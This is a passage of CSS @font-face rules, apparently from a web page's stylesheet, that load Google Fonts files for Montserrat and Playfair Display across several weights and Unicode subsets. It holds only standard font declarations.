url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face 